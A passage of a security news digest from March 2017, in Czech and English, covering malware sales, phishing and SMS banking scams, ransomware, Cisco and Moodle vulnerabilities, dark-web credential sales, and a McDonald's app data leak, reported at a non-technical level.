Původce softwaru objevila bezpečnostní společnost Sixgill, a to v uzavřeném ruském diskuzním fóru. Tam autor nabízel Proton zabalený do libovolné aplikace „na přání zákazníka“, přičemž si za službu účtoval nejprve 100 bitcoinů (3,2 milionu korun), nicméně později slevil na 40 bitcoinů (1,3 milionu korun) za neomezené množství kopií. Pokud by chtěl někdo cíleně sledovat jen jednotlivce, mohl si za 2 bitcoiny zaplatit jen jednu instalaci.

9 věcí, které uživatelé Windows závidí „mekařům“
Jakmile Sixgill zveřejnil informace o nalezeném zdroji, stránka byla krátce na to odstraněna. Zda už se tento typ malwaru stačil nějakým způsobem rozšířit se zatím neví.


Německo se obává kybernetických útoků v době voleb

21.3.2017 Živě.cz BigBrother
Německo zvýšilo pohotovost svých bezpečnostních sil proti počítačovým útokům. Německá vláda se tak rozhodla s cílem připravit se na možné podobné útoky v době nadcházejících parlamentních voleb. Uvedl to v neděli německý list Welt am Sonntag.
Weby vládních úřadů v Berlíně jsou již nyní terčem hackerů. „Zaznamenáváme denně útoky proti vládním sítím,” řeklo listu vedení Spolkového úřadu pro bezpečnost v informační technice (BSI).

Počet a rozsah útoků neupřesnilo, jejich počet se prý ale zvyšuje od zásahu hackerů do loňských prezidentských voleb v USA.

Útoky nejsou výjimečné
Kybernetické útoky s politickým podtextem nejsou tak výjimečné, jak by se mohlo na první pohled zdát. V minulých týdnech například opakovaným útokům čelil server rakouského ministerstva zahraničí.

Stopy podle všeho vedou v případě rakouských útoků do Turecka. Mluvčí rakouského ministerstva zahraničí Thomas Schnöll již dříve uvedl, že ministr Sebastian Kurz se útoky nenechá odradit od své politiky vůči Turecku.

Vztahy Vídně a Ankary jsou dlouhodobě napjaté. V Rakousku žijí stovky tisíc Turků, z nichž mnozí mají dvojí občanství. Zástupci Ankary mezi nimi hledají podporu pro navržené změny ústavy, které by výrazně posílily pravomoci tureckého prezidenta Recepa Tayyipa Erdogana.


Microsoft zakáže aktualizace starších Windows na nejnovějším hardwaru

21.3.2017 Živě.cz IT
Microsoft se chystá pro systémy Windows 7 a Windows 8.1 prosadit novou politiku podpory. A ta je pro uživatele krajně nevýhodná.

Osobní počítače poháněné nejnovějšími procesory od AMD, Intel a Qualcommu budou mít v případě systémů Windows 7 a Windows 8.1 zablokované přijímání bezpečnostních updatů, naznačuje revidovaný dokument Microsoftu týkající se plánů aktualizací.

"Váš počítač používá procesor, který v této verzi systému Windows není podporován, a proto nebude přijímat aktualizace." Tak nějak by mohla vypadat zpráva, kterou příslušní uživatelé obdrží.

Chybová hláška se spustí, když se Windows 7 nebo Windows 8.1 pokusí načíst aktualizace na zařízeních s procesory sedmé generace od společnosti Intel a AMD – tedy Kaby Lake a Bristol Ridge – respektive s mobilními procesory Snapdragon 820 od Qualcommu.

Tyto procesory hodlá Microsoft podporovat pouze v rámci operačního systému Windows 10, uvádí dokument Microsoftu zaměřený právě na změnu principu aktualizací.

Windows 8.1 a Windows 7 na zařízeních s výše uvedenými procesory nebudou schopné skenovat nebo stahovat aktualizace prostřednictvím služby Windows Update nebo Microsoft Update.

Microsoft předpověděl určité změny na tomto poli už vloni v lednu 2016, kdy uvedl, že provozovat Windows 7 a Windows 8.1 na nejnovějších procesorech je „náročné“. Následně se rozhodl tyto aktualizace omezit a podstatně zkrátil i podporu samotného Windows 7.

Co se týče šesté generace čipů Intelu (Skylake), tam měla být podpora garantovaná původně jen do poloviny letošního roku, pak o rok později a nakonec podle všeho omezení vůči procesorům Skylake mizí úplně – takže konečný termín bude shodný s tím, kdy se ukončí celková podpora Windows 7, resp. Windows 8.1.

Někteří uživatelé nesou nejnovější krok Microsoftu dost nelibě a poukazují na to, že by se výrobce operačního systému neměl zabývat tím, jak „nové“ mají lidé ve svých počítačích.

Ukončení podpory Windows 7 a 8.1 pro nejnovější hardware je podle nich šokující i kvůli tomu, že uvedené operační systémy jsou pro potřeby uživatelů stále dostačující, takže není důvod je měnit za Windows 10.

Windows 7 bude mít aktualizace zabezpečení až do 14. ledna 2020, Windows 8.1 pak do 10. ledna 2023.


Kyberzločinci cílí na počítače i mobily. Podvody poznají jen pozorní

21.3.2017 Novinky/Bezpečnost Bezpečnost
Chytré telefony, tablety i klasické počítače – na všechna tato zařízení se v dnešní době zaměřují kyberzločinci. Útoků je navíc rok od roku více. Bránit se proti celé řadě z nich mohou uživatelé pomocí nejrůznějších bezpečnostních aplikací. Stejně tak je ale důležité být při práci na internetu ostražitý.
Triky počítačových pirátů jsou totiž neustále sofistikovanější a některé škodlivé kódy dokážou dokonce zablokovat i práci antivirových programů a firewallů. Pokud se tedy uživatel nechá napálit a stáhne do svého stroje nějakého nezvaného návštěvníka, antivirus jej nemusí vždy upozornit, že je něco v nepořádku – jednoduše kvůli tomu, že je zablokovaný.

V první řadě tak musí být pozorný samotný uživatel, aby si nevědomky nezaviroval vlastní stroj. Sluší se také podotknout, že obezřetnost není na místě pouze v případě klasických počítačů. Kyberzločinci se totiž stále častěji zaměřují také na mobily a tablety, kde si většina lidí se zabezpečením hlavu neláme.

Nezvané návštěvníky dokážou v počítači i mobilu odhalit speciální programy. Kromě klasických antivirů jde například o aplikace, které se soustředí pouze na špionážní software a hledání trojských koňů.

Velmi důležité jsou také aktualizace, protože právě chyby v operačním systému a nejrůznějších programech počítačoví piráti velmi často zneužívají k tomu, aby do něj propašovali nezvané návštěvníky. S jejich instalací by tak lidé neměli otálet.

Vhodné je také sledovat, jaké triky jsou aktuálně mezi kyberzločinci v kurzu. Právě díky tomu mohou být uživatelé krok před počítačovými piráty a minimalizovat tak šanci, že se nechají napálit. Níže přinášíme přehled pěti podvodů, se kterými se v poslední době mohli setkat tuzemští uživatelé.

Máme velmi důležitou zprávu
Za bankéře se vydávají počítačoví piráti v nevyžádaných e-mailech, které kolují v posledních dnech českým internetem. „Máte velmi důležitou zprávu ve vaší schránce. Chcete-li ji zobrazit, klikněte na odkaz níže,“ tvrdí kyberzločinci v podvodné zprávě. Snaží se přitom vzbudit dojem, že e-mail byl odeslán z České spořitelny.

Podvodníci se samozřejmě snaží donutit uživatele kliknout na odkaz ve zprávě, který vede na falešné stránky imitující službu Servis24, tedy internetové bankovnictví spořitelny. Pokud na podvodný web zadají důvěřivci svoje přihlašovací údaje, zpřístupní tak svůj účet kyberzločincům.

Ti navíc ihned po prvním přihlášení uživatelům tvrdí, že je jejich účet nutné ověřit prostřednictvím autorizační SMS zprávy. Pokud si ji důvěřivci nechají na svůj mobilní telefon skutečně zaslat a následně ji opíšou do podvodné zprávy, zpravidla tak rovnou přijdou o peníze na svém účtu – prozradit SMS kód je totiž stejné, jako kdyby útočníkům peníze naservírovali rovnou na zlatém podnosu. 

Váš účet je potřeba ověřit
Za bankéře se vydávají kyberzločinci i v dalším podvodu, tentokráte však pod hlavičkou Fio banky. Příjemce nevyžádaného e-mailu se snaží přesvědčit o tom, že je nutné ověřit jejich účet internetového bankovnictví.

Pozornější uživatelé mohou odhalit, že jde o podvod, hned na první pohled. Zpráva je napsaná sice česky, ale velmi krkolomně: „Vážený zákazníku, z bezpečnostních důvodů musíme ověřit svůj účet informace! Pro potvrzení klikněte zde.“

Pod slůvkem zde se ukrývá odkaz na podvodné webové stránky, jež imitují vzhled skutečného internetového bankovnictví Fio banky. Právě krkolomný slovosled je ale prvním vodítkem toho, že by uživatelé na odkaz v e-mailu neměli vůbec klikat. 

Bankovní malware se šíří přes SMS
Na pozoru by se měli mít lidé před SMS zprávami od neznámých zdrojů. Podle bezpečnostních expertů se totiž prostřednictvím nich mohou šířit škodlivé kódy. Kyberzločinci využívají stejnou taktiku, kterou již koncem ledna zkoušeli v Německu pod hlavičkou bank. Tehdy se soustředili výhradně na tamní uživatele. Aktuálně byla hrozba lokalizována i v češtině a šíří se v tuzemsku.

Problém představuje aplikace, kterou podvodníci prostřednictvím SMS zprávy propagují.
Jak vlastně útok probíhá? Součástí došlé zprávy je odkaz na stažení mobilní aplikace. Ta na první pohled nemusí s internetovým bankovnictvím vůbec souviset. „Tento nebezpečný malware se maskuje za údajnou aplikaci společnosti DHL, která však stáhne podvodnou aplikaci s názvem ‚Flash Player 10 Update‘ a ikonou společnosti DHL,“ konstatoval Štefanko.

Problém představuje právě aplikace, kterou podvodníci prostřednictvím SMS zprávy propagují. Jde totiž o trojského koně, který při otevření internetového bankovnictví podsune falešnou přihlašovací stránku. 

Chcete slevu 500 Kč?
I v případě dalšího podvodu zneužívali kyberzločinci SMS zprávy. Před několika týdny se vydávali za zaměstnance internetového obchodu Alza.cz a nabízeli lidem slevy. Ve skutečnosti se však snažili do jejich chytrého telefonu pouze propašovat škodlivý kód.

Podvodníkům jde nejčastěji o peníze.
Slevu? Raději ne...
„Vyhráváte nákup v hodnotě 500 Kč. Pokud do 12 hodin provedete objednávku přes naši aplikaci, bude zcela zdarma,“ tvrdí podvodníci v SMS zprávách. Součástí došlé zprávy je také přímo odkaz vedoucí a stažení aplikace Alza.cz, prostřednictvím které se má transakce uskutečnit. Pouze tak mohou lidé údajně vyhrát.

Ve skutečnosti však internetový obchod žádnou podobnou akci nemá. „Evidujeme podvodné SMS vydávající se za propagaci Alza.cz,“ varovali již dříve zástupci obchodu. Není nicméně vyloučeno, že stejný trik budou zkoušet počítačoví piráti pod hlavičkou úplně jiné společnosti – případnou slevu si je tak vhodné u avizované společnosti vždy nejprve ověřit. 

Nesrozumitelné klikyháky
V loňském roce se na internetu doslova roztrhl pytel s falešnými nabídkami na slevy a výhodné akce. Kyberzločinci se tak často vydávali za obchodníky nebo zástupce nějaké finanční společnosti a z důvěřivců lákali přihlašovací údaje či se jim snažili infikovat počítač škodlivým virem. Letos však přišli s daleko sofistikovanějším podvodem. Uživateli zobrazí jen roztodivné klikyháky.

Místo fontů si uživatel nainstaluje do svého počítače trojského koně.
„Byl zaznamenán nový trik, jak donutit uživatele k instalaci malwaru. V tomto případě je malware distribuován s pomocí webových stránek, na kterých se zobrazují nesmyslné znaky,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ.

Podobné znaky se často zobrazují například v textových dokumentech, pokud v počítači není nainstalovaný použitý font písem. Uživatel tak musí v praxi znakovou sadu manuálně doinstalovat, aby si mohl text přečíst.

A přesně na to sázejí počítačoví piráti. „Pokud uživatel na trik skočí, problémy mu teprve začnou, neboť si místo fontů nainstaluje do svého počítače trojského koně, nebo dokonce ransomware Spora,“ doplnil bezpečnostní analytik s tím, že s podobnými útoky se mohou uživatelé setkat i na legitimních webových stránkách, které se podaří počítačovým pirátům napadnout.


Tento GIF je podle FBI smrtící zbraň. Pozor, komu takový posíláte
21.3.2017 Živě.cz Bezpečnost
Ne často se stává, že předmětem kriminálního vyšetřování je tweet. Ale i takové případy existují. V polovině prosince byl novináři serverů Vanity Fair a Newsweek Kurtu Eichenwaldovi záměrně poslán tweet s blikajícím GIFem, jenž mu měl spustit záchvat, protože je o něm veřejně známo, že je epileptik. Nyní celý případ vyšetřuje FBI a odesílatel byl zatčen.
Tweet s agresivně blikajícím GIFem a zprávou „za svůj článek si zasloužíš záchvat“ odeslal uživatel @jew_goldstein a Eichenwaldovi skutečně záchvat způsobil. Novinář následně oznámil, že si od Twitteru dá pauzu a na útočníka podá trestí oznámení. O tři měsíce později FBI muže, jenž účet @jew_goldstein spravoval, zadržela.

Klepněte pro větší obrázek
Blikající GIF skutečně epileptickému novináři záchvat způsobil. Hvězda stroboskopicky přeblikávala do kontrastních barev.

Útočníkem byl 29letý John Rivello. Obviněn je z kyberšikany a podle tohoto soudního dokumentu z útoku smrtící zbraní. Novináři GIF poslal údajně kvůli jeho politickým názorům, a protože je Žid. V obvinění také stojí, že nabádal další uživatele, aby GIF muži posílali.

Jako důkaz byl použit Rivellův účet na iCloudu, ve kterém vyšetřovatelé našli odkazy na Eichenchaldovu stránku na Wikipedii a web o epilepsii Epilepsy.com.


Už se kradou i viry. Jeden ransomware využívá pirátskou kopii jiného
21.3.2017 Živě.cz Viry

Bezpečnostní experti odhalili nový typ vyděračské škodlivého softwaru PetrWrap, který šifruje osobní data a za odblokování vyžaduje výkupné. Pozornost poutá zejména ukradeným zdrojovým kódem z jiného ransomwaru od konkurenční skupiny, upozorňuje Kaspersky Lab.
Do nitra zákeřného ransomwaru. Takto vypadá útok na počítače personalistek
Autoři kódu Petya určeného pro tvorbu účinného ransomwaru nabízí za poplatek distribuci jiným kyberzločineckým skupinám na černém trhu. Přidali k němu i kontrolní mechanismus, aby se nedal využívat bez zaplacení v „neautorizovaných“ typech malwaru. Jenže autorům PetrWap se však ochranu podařilo obejít.

Nežádoucí činnost infiltrace analytici pozorují jen od začátku roku, nezodpovězená však zůstává otázka způsobu jejího šíření. „Tvůrci používají vlastní šifrovací klíče, které jsou odlišné od těch, které nabízí ve svých prodávaných verzích Petya. Takže i proto dokáží zcela samostatně fungovat,“ informuje Kaspersky Lab.
Státy Evropy spojují síly proti vyděračským virům
Z technického pohledu dnes Petya a z ní odvozené viry patří mezi ty nejvážnější hrozby. Na počítači zašifruje data, přepíše celý pevný disk a znemožní načítání operačního systému.

V minulosti sice díky chybám v kryptografii výzkumníci našli způsob odemknutí napadených souborů, ale zločinci nedostatky odstranili a vytvořili aktuálně stále neprolomitelný ransomware.


Searching for Leaked Celebrity Photos? Don't Blindly Click that Fappening Link!
21.3.2017 thehackernews  Privacy
Are you curiously googling or searching torrents for nude photos or videos of Emma Watson, Amanda Seyfried, Rose McGowan, or any other celebrities leaked in The Fappenning 2.0?
If yes, then beware, you should not click any link promising Fappenning celebrity photos.
Cybercriminals often take advantage of news headlines in order to trap victims and trick them into following links that may lead to websites containing malware or survey scams.
Last week, a few private photos of Emma Watson and Amanda Seyfried — ranging from regular selfies to explicitly sexual photos — were circulating on the Internet forums, including Reddit and 4chan, with UK's TV presenter Holly Willoughby and US actor Rose McGowan among the latest alleged victims.
Now, according to the security researchers from MalwareBytes, scammers are exploiting this new batch of leaked celebrity photos and videos by using their stolen selfies to lure victims on social media sites and making dollars.
One of the scam campaigns uncovered by MalwareBytes targets Twitter users, promising them to follow mentioned links to access leaked embarrassing private photos of British WWE star Paige – whose intimate photos and videos, among other celebs, were leaked online last week without her permission in an act dubbed "The Fappening 2.0."

The Fappening 2.0 is named after similar leaks in 2014 when some anonymous hackers flooded the Internet with private photographs of Jennifer Lawrence, Kim Kardashian, Kate Upton and many hundreds of other celebrities by hacking their Apple's iCloud accounts.
Don't Install Any App To View Leaked Fappening Images — It's a Malware!
The latest scams spreading on Twitter read:
"VIDEO: WWE Superstar Paige Leaked Nude Pics and Videos"
"Incredible!!! Leaked Nude Pics and Videos of WWE Superstar Paige!!!!: [url] (Accept the App First)"
For accessing the content, scammers told you to first install a twitter app called "Viral News." In the hope of a glimpse of Paige's nude video, victims tricked into giving the malicious app permission to access their Twitter account, update their profile and post tweets on their behalf.
Once the app is installed, you are then sent to a site that serves no purpose other than enabling crooks to make money from affiliate marketing and advertising link clicks.
The site quickly grays out, asking you to click yet another link that eventually lands you on a survey page that promises to reward you with an Amazon gift card as soon as you hand over your details.
"Suffice to say, filling this in hands your personal information to marketers – and there is no guarantee you will get any pictures at the end of it," said Chris Boyd, a malware intelligence analyst at Malwarebytes.
Malware Hijacks Twitter Accounts to Spread Fappening Spam

While you are looking through all these links, the creepy app spams out the same tweets from your account, leading your followers to the same The Fappening 2.0 scam you fell for.
So far nearly 7,000 users have become a victim of the latest scam.
"As freshly leaked pictures and video of celebrities continue to be dropped online, so too will scammers try to make capital out of image-hungry clickers. Apart from the fact that these images have been taken without permission so you really shouldn’t be hunting for them, anyone going digging on less than reputable sites is pretty much declaring open season on their computers," Boyd concluded.
Here are some useful tips you can follow in an effort to protect yourself from scams shared through social media:
Don't take the bait. Stay away from promotions of "exclusive," "shocking" or "sensational" photos or footage. If it sounds too outlandish to be true, it is probably a scam.
Hover over links to see their real destination. Before you click on any link, mouseover the link to see where it'll take you. Do not click on links leading to unfamiliar sites.
Don't trust your friends online. It might not actually be your friends who are liking or sharing scam links to photos. Their account may have been hijacked by scammers.
Raise your Eyebrows when asked for something in return. Beware of any site that asks you to download and install software in order to view anything else, in this case, nude photos and videos of Paige. This is a known tactic of spreading scam.


US Bans Laptops, Tablets From Cabins on Flights From Middle East

21.3.2017 securityweek  Security
The United States warned Tuesday that extremists plan to target passenger jets with bombs hidden in electronic devices, and banned carrying them onto flights from 10 Middle East airports.

Senior US officials told reporters that nine airlines from eight countries had been given 96 hours, beginning at 3:00 am (0700 GMT), to ban devices bigger than a cellphone or smartphone from the cabin.

Laptops, tablets and portable game consoles are affected by the ban -- which applies to direct flights to the United States -- but they may still be stowed in the hold in checked baggage.

Passengers on approximately 50 flights per day from some of the busiest hubs in the Middle East, Turkey and North Africa will be obliged to follow the new emergency ruling.

"The restrictions are in place due to evaluated intelligence and we think it's the right thing to do and the right places to do it to secure the safety of the traveling public," one US official said.

The officials, speaking on condition of anonymity, refused to discuss the "intelligence information" that led the Transportation Security Administration to issue the order.

But one said that concerns had been "heightened by several successful events and attacks on passenger lanes and airports over the last years."

No end date

The official would not go into detail about which attacks had raised fears, but did cite an incident from February of last year in which suspected Somali Islamists blew a hole in the side of Daallo Airlines passenger jet with a small device. Only the bomber was killed and the plane landed safely.

CNN quoted a US official as saying the ban was believed to be related to a threat posed by Al-Qaeda in the Arabian Peninsula, known as AQAP.

"Evaluated intelligence indicates that terrorist groups continue to target commercial aviation and are aggressively pursuing innovative methods to undertake their attacks, to include smuggling explosive devices in various consumer items," an official said.

The airports touched by the ban are Queen Alia International in Amman, Jordan; Cairo International in Egypt; Ataturk in Istanbul, Turkey; King Abdulaziz International in Jeddah, Saudi Arabia; King Khalid International in Riyadh, Saudi Arabia; Kuwait International; Mohammed V International in Casablanca, Morocco; Hamad International in Doha, Qatar; and the Dubai and Abu Dhabi airports in the United Arab Emirates.

No US carriers make direct flights from these airports, so they are unaffected by the ban, which will hit Royal Jordanian, EgyptAir, Turkish Airlines, Saudi Airlines, Kuwait Airways, Royal Air Maroc, Qatar Airways, Emirates and Etihad Airways.

The airlines and their host governments have already been informed of the order by US officials, and some of them have begun informing passengers about the restriction.

Airlines will be responsible for policing the cabin ban, and if they fail to do so could lose their rights to operate US routes.

No end date has been put on the order, and officials would not say whether the restriction might spread to other airports.


Cisco Patches Serious DoS Flaws in IOS

21.3.2017 securityweek  Vulnerebility
Cisco has released updates for its IOS and IOS XE software to address a couple of high severity flaws that can be exploited to cause a denial-of-service (DoS) condition on vulnerable devices.

The security holes were disclosed on Monday by Omar Eissa, a researcher at Germany-based security firm ERNW, at the TROOPERS conference in a talk focusing on Cisco’s Autonomic Networking Infrastructure (ANI). The ANI vulnerabilities found by Eissa allow unauthenticated attackers to cause affected devices to reload.

One of the flaws, identified as CVE-2017-3850, can be exploited by a remote attacker simply by knowing the targeted Cisco device’s IPv6 address. The weakness can be exploited by sending a specially crafted IPv6 packet to an appliance, but the attack only works if the device runs a version of IOS that supports ANI and its IPv6 interface is reachable.

The second vulnerability, CVE-2017-3849, can be exploited if the targeted device is running an IOS release that supports ANI, it’s configured as an autonomic registrar, and it has a whitelist configured.

If these conditions are met, an adjacent attacker can cause a DoS condition by sending the appliance a specially crafted autonomic network channel discovery packet.

Cisco has published indicators of compromise (IoC) and the company’s IOS Software Checker can be used by customers to determine if their IOS and IOS XE software is vulnerable to such attacks. The networking giant has found no evidence of exploitation in the wild.

These are not the only serious IOS vulnerabilities disclosed recently by Cisco. Last week, the company informed customers that an analysis of the Vault 7 files made public this month by WikiLeaks revealed the existence of a critical remote code execution flaw affecting more than 300 of the company’s switches and modules.

In the Vault 7 files, which allegedly describe the CIA’s hacking capabilities, Cisco also identified a piece of malware that can hijack its devices and abuse them for various purposes, including data theft and manipulating web traffic.


Over 20 million Gmail and 5 million Yahoo accounts available for sale on the Dark Web
21.3.2017 securityaffairs Crime

A vendor with the online moniker “SunTzu583” is reportedly selling millions of login credentials for Gmail and Yahoo accounts on a black market in the dark web. Over 20 million Gmail accounts and 5 million Yahoo accounts are available for sale, the huge trove of data is the result of previous massive data breaches.

SunTzu583 is known to security experts, he was specialized in the sale of stolen login credentials.

A couple of weeks ago the colleagues at HackRead reported the sale of more than 1 million Gmail and Yahoo accounts by the same seller and a few days later, SunTzu583 started selling PlayStation accounts.

Dark web Playstation accounts

SunTzu583 offered 640,000 PlayStation accounts for USD 35.71 (0.0292 BTC), the dump includes emails and clear-text passwords.

SunTzu583 confirmed that the archive was not directly stolen from PlayStation network, but it does contain unique accounts of PlayStation users. The seller added that even if the accounts may work for other web services they are first of all PlayStation accounts.

Back to the present, the seller SunTzu583 is offering in separate listings millions of Gmail accounts.

In three different listings, he is offering 4,928,888 accounts.

“The total number of Gmail accounts being sold are 4,928,888 which have been divided into three different listings. All three listings contain 2,262,444 accounts including emails and their clear text passwords.” reports the analysis published by HackRead. “In the description of these listings, SunTzu583 has mentioned that “Not all these combinations work directly on Gmail, so don’t expect that all these email and passwords combinations work on Gmail.””

The researchers at HackRead who have compared the listings with Hacked-DB and Have I been pwned repositories confirmed that the sources of the data are past data breaches including LinkedIn (117 million accounts), Adobe (153 million accounts) and Bitcoin Security Forum (5 million Gmail passwords).

Dark Web Gmail

The vendor SunTzu583 is offering also another separate listing including additional 21,800,969 Gmail accounts that go for USD 450.48 (BTC 0.4673). According to the seller, 75% accounts contain decrypted passwords while 25% passwords are hashed. Upon scanning, HackRead can confirm that the data has been stolen from various data breaches including

Also in this case, HackRead confirmed that the origin of the data are various data breaches occurred in the past, including Nulled.cr breach in May 2016, MPGH.net breach, and Dropbox breach.

The seller is also allegedly selling 5,741,802 Yahoo accounts for $250 (0.2532 Bitcoins).

Dark Web

Most of the accounts listed were not active and the sources may be MySpace, Adobe and LinkedIn data breaches.

The dark web vendor warns users that not all the login credentials work.


FBI's Comey: From Clinton Bugbear to Thorn in Trump's Side?

21.3.2017 securityweek BigBrothers
Eight months ago, James Comey hampered Hillary Clinton's White House bid with a damning assessment of her email practices.

On Monday, the powerful FBI chief lobbed another bombshell into the world of US politics -- this time directed at the sitting president, Donald Trump.

In a high-stakes congressional hearing followed live by millions in America and around the world, Comey flatly rejected Trump's explosive claim that he was wiretapped by his predecessor Barack Obama.

Comey delivered his assessment without a blink, telling lawmakers neither the Federal Bureau of Investigation nor the Justice Department had evidence to support such allegations.

Intensely concentrated, with furrowed brow, the towering Comey -- he stands 6'8" (two meters) tall -- took the heat during a marathon first public hearing on the issue of Russian meddling in last year's election, and Trump's unsubstantiated allegations of wiretapping.

The 56-year-old projected the cool demeanor of a veteran public official throughout the marathon hearing, during which he confirmed for the first time that his agency is investigating Russia's alleged election interference and notably Moscow's possible collusion with Trump's campaign.

But the FBI chief, who has been in his post since September 2013, is also a highly-skilled political operator, who knows his words carry weight.

The Democrat Clinton learned that the hard way, when Comey called a surprise press conference last July to deliver a dressing-down over her use of a private email server that reverberated all the way to the November polls.

Comey angered Republicans by deciding not to press charges against the former secretary of state. But Clinton, to this day, believes that Comey's public berating of her, followed by a last-minute intervention resurrecting the controversy in October, cost her the election.

When Trump decided to keep the Obama appointee in his job, it raised eyebrows from critics who saw it as a tacit reward for the part he played in damaging Clinton's chances.

But the FBI chief increasingly looks to be a thorn in the president's side.

- Straight shooter -

Comey has now set his sights on the issue of Russian election meddling, which has stalked Trump's young presidency.

And if there is one character trait the FBI chief is known for, it is tenacity.

Comey locked horns relentlessly with Silicon Valley as he sought to convince Apple to unlock a smartphone used by the perpetrator of a terror attack in California. The FBI's own experts ended up breaking into the device.

Under Obama, Comey repeatedly stole the spotlight from his boss, former attorney general Loretta Lynch, who was reduced in the Clinton case to announcing she was following his advice not to press charges.

The burning-hot Clinton investigation -- which saw Comey assailed on all sides -- did much to cement his reputation as a straight shooter, as well as thrust him into the public eye.

But Comey has been circulating in political and legal circles at the highest level for three decades, giving him the confidence to challenge the country's justice department, and even the White House.

In the wake of the 2014 fatal police shooting of unarmed black teen Michael Brown in Ferguson, Missouri, Comey raised hackles by supporting cops who were wary of fulfilling their duties, for fear of their actions being caught on video.

- Independent -

Many top US government careers begin in New York, and Comey is no exception -- he hails from the Manhattan suburbs. He cut his teeth as a federal prosecutor in New York and the Washington area.

In 2003, the father-of-five became deputy attorney general.

The following year, he faced one of his toughest showdowns, confirming his reputation for being independent and unafraid.

Comey had become acting attorney general due to the illness of his boss John Ashcroft.

At Ashcroft's bedside, the presidential counsel to George W. Bush, Alberto Gonzales, was trying to persuade him to reauthorize a controversial warrantless eavesdropping program.

Comey -- who was against extending the program -- later revealed the incident to senators, unleashing a political firestorm.


Serious Flaws Found in Moodle Learning Platform

21.3.2017 securityweek Vulnerebility
Researchers have discovered serious vulnerabilities in Moodle, a popular open-source learning platform used by many top universities in the United States, the United Kingdom and other countries around the world.

Moodle updates released last week address a total of four vulnerabilities, including two that have a “serious” severity/risk rating and two classified as “minor.”

One of the serious flaws, tracked as CVE-2017-2641, can be exploited by an attacker to execute arbitrary PHP code on a vulnerable Moodle server. While the security hole is tracked as a single issue, Netanel Rubin, the expert who discovered the problem, says an attack is possible due to several smaller weaknesses affecting the platform.

The flaw can be exploited by an authenticated attacker to conduct an SQL injection attack via user preferences and add a new administrator user to the system. Once the attacker has an admin account on the system, they can execute arbitrary code by uploading a new plugin or a template to the server, Rubin said.

This vulnerability affects Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and older versions, and it has been fixed with the release of versions 3.2.2, 3.1.5, 3.0.9 and 2.7.19.

Moodle developers noted that the flaw can only be exploited in Moodle versions prior to 3.2 by users with manager or admin rights. In version 3.2, the attack works with any type of user account, including teacher and student accounts.

Rubin, who recently warned that vulnerabilities in smart electricity meters expose consumers and electric utilities to cyberattacks, has published a lengthy blog post detailing his findings.

The second serious flaw patched by Moodle last week has been described as a cross-site scripting (XSS) flaw in the functionality that allows users to attach files for evidence of prior learning.

“Serving files attached to evidence of prior learning did not force download. When viewed by other users they would be opened in current moodle sessions,” Moodle wrote in its advisory.

The flaw, reported by a researcher who uses the online moniker “wez3” and tracked as CVE-2017-2645, only affects versions 3.2 to 3.2.1 and 3.1 to 3.1.4.

Jaymark Pestaño discovered a less severe XSS vulnerability in the evidence of prior learning section, and Nadav Kavalerchik identified an issue related to usernames being displayed in global search for unauthenticated users. Both issues are considered minor.


New Bill Forces Cybersecurity Responsibility Into the Boardroom

21.3.2017 securityweek Cyber

Cybersecurity Disclosure Act of 2017 Forces Cybersecurity Responsibility Into the Boardroom

The need for board-level responsibility for cyber security is generally accepted but not always applied. A new bill introduced to the Senate seeks to change this by requiring a board level statement of cyber security expertise or practice in annual SEC filings.

S536, cited as the 'Cybersecurity Disclosure Act of 2017', is sponsored by Democrats Mark Warner of Virginia and Jack Reed of Rhode Island, and Republican Susan Collins of Maine. Its purpose is to promote transparency in the oversight of cybersecurity risks at publicly traded companies.

The bill (PDF) defines a cyber security threat as any action not protected by the First Amendment that "may result in an unauthorized effort to adversely impact the security, availability, confidentiality, or integrity of an information system or information that is stored on, processed by, or transiting an information system..."

The bill then proposes just three requirements under the aegis of the Securities and Exchange Commission (SEC): that annual reports to the SEC must disclose the level of cyber security expertise of the board; or, if none exists, what "other cybersecurity steps taken by the reporting company were taken into account"; and that the definition of what constitutes that expertise should come from the SEC in consultation with NIST.

"It is in the best interest of consumers and shareholders for companies to fully disclose the plans they've set in place to defend against [data breaches]," Warner said in a statement announcing the legislation. "This legislation provides needed transparency in an often-shrouded process that directly affects the privacy of millions, and will serve as tool to urge other entities to follow through on establishing a reliable strategy to counter cyberattacks."

The effect of the bill will be to make the board legally and transparently responsible for cyber security. It is not the first regulation to seek this effect in 2017. On 1 March, the New York Department of Financial Services' 23 NYCRR 500 regulation came into force. That regulation imposes a responsibility for regulated organizations to name a 'CISO' who will provide an annual cyber security report to be submitted and signed off by the board to the regulator.

Taken together, these two examples of new regulations suggest that regulatory authorities are no longer satisfied to make recommendations about board-level security responsibility, but are now ready to mandate and legally require it.

The implication is that it is no longer sufficient that organizations should have security in the board, it will increasingly become a legal requirement.


McDonald's App Leaks Details of 2.2 Million Customers

21.3.2017 securityweek Incindent
A vulnerable application used by millions of McDonald’s customers in India was recently found to leak personal information on its users.

Dubbed McDelivery, the web application was found to be leaking the personal information of over 2.2 million users. According to Fallible, the software security startup that discovered the bug, user data such as names, email addresses, phone numbers, home addresses, home co-ordinates, and social profile links were leaked by the application.

The issue, they reveal, resides in an unprotected publicly accessible API endpoint that was designed to deliver user details, which is coupled with serially enumerable integers as customer IDs. The pair can be used to pull the personal information pertaining to all of the application’s users.

“The mistake in this case was trivial and ought to have been fixed in a day at max. The app/website provides a facility to retrieve the current user details but does not check if the user ID being asked is the same user who has logged in. The user ID in this case is a plain number that starts from 1 and can be enumerated easily,” Abhishek Anand, Fallible co-founder, told SecurityWeek.

The vulnerability was discovered and disclosed on Feb. 7, and the company received acknowledgement from a Senior IT Manager at McDonald’s on Feb. 13, but the issue was addressed only last week, it seems. According to Fallible, however, McDonald’s fix wasn’t released in a timely manner and was also incomplete.

“We have always respected a company's request if they wanted more time to fix any issue but sadly they stopped responding after 4 weeks which led to us warning users that their data is out in the open. In fact, the 'fix' applied right now is incomplete and the vulnerability exists even now and we have intimated the same to the concerned company,” Anand told us.

Over the weekend, McDonald's published a statement on Facebook, saying that it has released an updated iteration of the McDelivery application and that it is prompting all users to update as soon as possible, as a precautionary measure.

“We would like to inform our users that our website and app does not store any sensitive financial data of the users like credit card details, wallets passwords or bank account information. The website and app has always been safe to use, and we update security measure on regular basis. As a precautionary measure, we would also urge our users to update the McDelivery app on their devices,” the statement reads.

